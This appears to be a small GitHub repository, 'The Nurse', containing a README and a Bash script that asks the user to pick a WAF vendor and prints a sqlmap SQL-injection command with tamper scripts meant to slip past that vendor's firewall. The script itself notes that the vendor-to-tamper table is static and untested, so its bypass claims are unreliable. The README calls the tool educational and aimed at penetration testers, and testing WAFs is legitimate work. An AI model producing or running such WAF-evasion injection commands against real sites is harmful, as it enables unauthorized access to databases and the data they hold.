├── LICENSE ├── README.md └── the-nurse.sh /LICENSE: -------------------------------------------------------------------------------- 1 | MIT License 2 | 3 | Copyright (c) 2023 emedina 4 | 5 | Permission is hereby granted, free of charge, to any person obtaining a copy 6 | of this software and associated documentation files (the "Software"), to deal 7 | in the Software without restriction, including without limitation the rights 8 | to use, copy, modify, merge, publish, distribute, sublicense, and/or sell 9 | copies of the Software, and to permit persons to whom the Software is 10 | furnished to do so, subject to the following conditions: 11 | 12 | The above copyright notice and this permission notice shall be included in all 13 | copies or substantial portions of the Software. 14 | 15 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR 16 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, 17 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE 18 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER 19 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, 20 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE 21 | SOFTWARE. 22 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | __ 2 | | +| 3 | ,,,|__| 4 | $$$ , , 5 | $$C > 6 | $$$; _< 7 | _______/ /_ ___ 8 | | |__` \~/o\ _,]-]___]-----> 9 | | / \( ) )\/.-// 10 | _( \ ) / \ | 11 | //| / ,/ \/ 12 | '/ o \ 13 | / o \ 14 | /______/\_\ 15 | \ || / 16 | \ || / 17 | \ || / 18 | / )( \ 19 | |/ \| 20 | :] [: 21 | o| |o 22 | /o| |o\ 23 | `-' `-'` 24 | 25 | # The Nurse 26 | ## A WAF Bypass SQLMap Tamper Assistant. 27 | 28 | 29 | This is a Bash script that helps with bypassing Web Application Firewalls (WAFs) using SQLMap tamper options. 
It provides a list of WAF vendors, prompts the user to select a vendor, and then suggests a set of useful tamper options for SQLMap that have been found to be effective against the selected vendor's WAF. 30 | 31 | ## Usage 32 | To use the script, simply run it in a Bash terminal: 33 | 34 | bash 35 | 36 | ./the-nurse.sh 37 | 38 | -The script will present a list of WAF vendors and prompt you to select a vendor. Once you have selected a vendor, the script will suggest a set of useful tamper options for SQLMap that can help bypass that vendor's WAF. 39 | 40 | -The script will output the SQLMap command with the selected options, which you can then copy and paste into your terminal to execute the injection. 41 | 42 | ## Dependencies 43 | 44 | This script requires the following dependencies: 45 | 46 | Bash (version 4 or later) 47 | SQLMap (version 1.0 or later) 48 | 49 | Make sure that these dependencies are installed and available in your $PATH before running the script. 50 | 51 | ## Disclaimer 52 | 53 | This script is for educational purposes only. It is intended to help security researchers and penetration testers understand the limitations of WAFs and to help them test the effectiveness of their bypass techniques. Do not use this script for any illegal activities. The author of this script is not responsible for any damage or harm caused by its use. 
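#!/bin/bash
#
# the-nurse.sh - interactive helper that prints a sqlmap command line.
#
# Shows a numbered list of WAF vendor names, reads one number from stdin,
# looks up the tamper-script pair hard-coded for that name and echoes a
# sqlmap command containing it. The command is only printed, never executed.
#
# NOTE(review): the vendor -> tamper table below is static text. Nothing in
# this script fingerprints a WAF or checks that a pair has any effect on the
# named product, so treat the output as an untested starting point.

vendors=(
  "Akamai"
  "Alert Logic"
  "Amazon Web Services (AWS)"
  "AppTrana"
  "Barracuda"
  "Cloudbric"
  "Cloudflare"
  "Comodo"
  "DenyAll"
  "F5 Networks"
  "Fortinet"
  "Imperva"
  "Incapsula"
  "Juniper Networks"
  "Microsoft Azure"
  "ModSecurity"
  "Neustar"
  "NSFOCUS"
  "Palo Alto Networks"
  "Radware"
  "Sophos"
  "Sucuri"
  "Symantec"
  "Wallarm"
  "WatchGuard"
  "WebARX"
  "WhiteHat Security"
  "Zenedge"
  "Trustwave"
  "SiteLock"
  "Tenable"
  "Qualys"
  "Rapid7"
)

# Print list of vendors
echo "Your best aid when its about bypassing WAFs using sqlmap"
echo "Select the WAF vendor from the list below:"
for i in "${!vendors[@]}"; do
  echo "$i. ${vendors[$i]}"
done

# Get user input for vendor
while true; do
  # -r keeps backslashes literal. A failed read means stdin is closed;
  # stop here instead of re-prompting forever.
  if ! read -r -p "Enter the vendor number: " vendor_number; then
    echo "No input received." >&2
    exit 1
  fi
  # Accept plain decimal digits only, and do it before any numeric test:
  # [[ x -lt y ]] and array subscripts evaluate their operands as arithmetic
  # expressions, so raw text would be evaluated rather than compared. The
  # length cap keeps the value inside bash's integer range.
  if [[ $vendor_number =~ ^[0-9]{1,9}$ ]]; then
    choice=$((10#$vendor_number)) # base 10, so "08" is not read as octal
    if ((choice < ${#vendors[@]})); then
      vendor=${vendors[choice]}
      break
    fi
  fi
  echo "Invalid option. Please try again."
done

echo "You selected $vendor."

# Select useful tamper
case "$vendor" in
  "Akamai") useful_tamper="space2dash,randomcase" ;;
  "Alert Logic") useful_tamper="randomcase,randomcomments" ;;
  "Amazon Web Services (AWS)") useful_tamper="randomcomments,space2mssqlhash" ;;
  "AppTrana") useful_tamper="space2mssqlhash,space2morehash" ;;
  "Barracuda") useful_tamper="space2morehash,space2plus" ;;
  "Cloudbric") useful_tamper="randomcase,space2comment" ;;
  "Cloudflare") useful_tamper="luanginx,space2plus" ;;
  "Comodo") useful_tamper="space2plus,space2mysqldash" ;;
  "DenyAll") useful_tamper="space2comment,space2mssqlhash" ;;
  "F5 Networks") useful_tamper="space2plus,space2mysqlblank" ;;
  "Fortinet") useful_tamper="space2plus,space2randomblank" ;;
  "Imperva") useful_tamper="space2morehash,randomcase" ;;
  "Incapsula") useful_tamper="space2morehash,space2comment" ;;
  "Juniper Networks") useful_tamper="randomcase,space2mssqlhash" ;;
  "Microsoft Azure") useful_tamper="space2mssqlhash,space2comment" ;;
  "ModSecurity") useful_tamper="space2mssqlhash,space2plus" ;;
  "Neustar") useful_tamper="space2mssqlhash,space2mysqldash" ;;
  "NSFOCUS") useful_tamper="randomcase,space2mysqlblank" ;;
  "Palo Alto Networks") useful_tamper="space2mssqlhash,space2randomblank" ;;
  "Radware") useful_tamper="space2comment,randomcase" ;;
  "Sophos") useful_tamper="space2plus,space2mssqlhash" ;;
  "Sucuri") useful_tamper="space2randomblank,space2comment" ;;
  "Symantec") useful_tamper="randomcase,space2mysqldash" ;;
  "Wallarm") useful_tamper="space2mssqlhash,space2mysqlblank" ;;
  "WatchGuard") useful_tamper="space2mssqlhash,space2randomblank" ;;
  "WebARX") useful_tamper="space2mssqlhash,randomcase" ;;
  "WhiteHat Security") useful_tamper="space2comment,space2plus" ;;
  "Zenedge") useful_tamper="space2comment,space2mssqlhash" ;;
  "Trustwave") useful_tamper="randomcase,space2mysqldash" ;;
  "SiteLock") useful_tamper="space2comment,space2mysqlblank" ;;
  "Tenable") useful_tamper="space2plus,space2randomblank" ;;
  "Qualys") useful_tamper="space2mysqlblank,randomcase" ;;
  "Rapid7") useful_tamper="randomcase,space2mssqlhash" ;;
  *)
    # Reached only if the vendors array and this table drift apart; fail
    # loudly rather than print a command with an empty --tamper value.
    echo "No tamper entry for $vendor." >&2
    exit 1
    ;;
esac

# SQLmap command with selected options
echo "The nurse assisted you preparing the injection..."
echo "SQLmap command for $vendor:"
echo "sqlmap -u http://TARGET.com/page.php?id=1 --tamper=$useful_tamper --random-agent"
echo "Good luck!!"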